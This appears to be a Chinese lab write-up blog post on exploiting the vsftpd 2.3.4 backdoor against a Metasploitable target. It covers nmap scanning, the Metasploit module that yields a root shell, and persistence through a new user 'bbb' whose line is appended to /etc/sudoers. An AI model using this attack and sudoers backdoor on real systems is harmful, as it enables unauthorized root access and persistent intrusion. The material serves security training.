笑脸漏洞(vsftpd 2.3.4)

本文介绍了VSFTPD 2.3.4版本中的后门漏洞,该漏洞允许攻击者通过特定用户名和密码组合获取未经授权的访问。详细步骤包括:查询靶场IP、确认连接、nmap扫描发现漏洞、使用Metasploit进行攻击并成功获取root权限,以及添加并提升用户权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞原理

VSFTPD(Very Secure FTP Daemon)是一个常用的FTP服务器软件。 “vsftpd 2.3.4 Backdoor”(也称为 “vsFTPd 2.3.4 Backdoor” 或 “vsftpd v2.3.4 backdoor”)。该漏洞最初于2011年被公开发现,影响了VSFTPD 2.3.4版本。这个版本中的一个后门(backdoor)允许攻击者通过一个特殊的用户名和密码组合来获得未经授权的访问权限。这个后门的存在可能导致攻击者执行恶意操作,例如未经授权地访问和修改FTP服务器上的文件。

环境

攻击机
  • kali3-amd64 (2022-11-07) x86_64 GNU/Linux
靶场
  • metasploitable 2.6.24-16-server

攻击记录

第一步:

查询目标靶场IP地址

ifconfig

在这里插入图片描述

第二步:

ping通靶场 证明可以进行正常连接

ping IP address

请添加图片描述

第三步:

在Kali中用nmap扫描目标主机的21端口,发现该靶场的ftp的版本存在笑脸漏洞(在检测到用户名带有特殊字符": )" )时,会自动打开6200端口,使用nc即可进行连接这个端口,取得管理员权限

nmap -p 21 -sV IP address

请添加图片描述

第四步

使用Metasploit 对该漏洞进行攻击

启动msfconsole

请添加图片描述

search vsftpd (搜索vsftpd漏洞)

请添加图片描述

show option

在这里插入图片描述

use 0
run

在这里插入图片描述

成功获得root权限

在这里插入图片描述

第五步

获得靶场权限,添加一个用户bbb (用户名:bbb 密码:bbb)

useradd bbb
passwd bbb

在这里插入图片描述

第六步

给我们自己用户获得root 权限

修改/etc/sudoers文件

echo "bbb ALL=(ALL) ALL" | tee -a /etc/sudoers

在这里插入图片描述

成功写入!

结果检测

  • 用户bbb登陆靶场

在这里插入图片描述

  • 用户bbb可以查看/etc/sudoers文件 提权成功!
    在这里插入图片描述
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值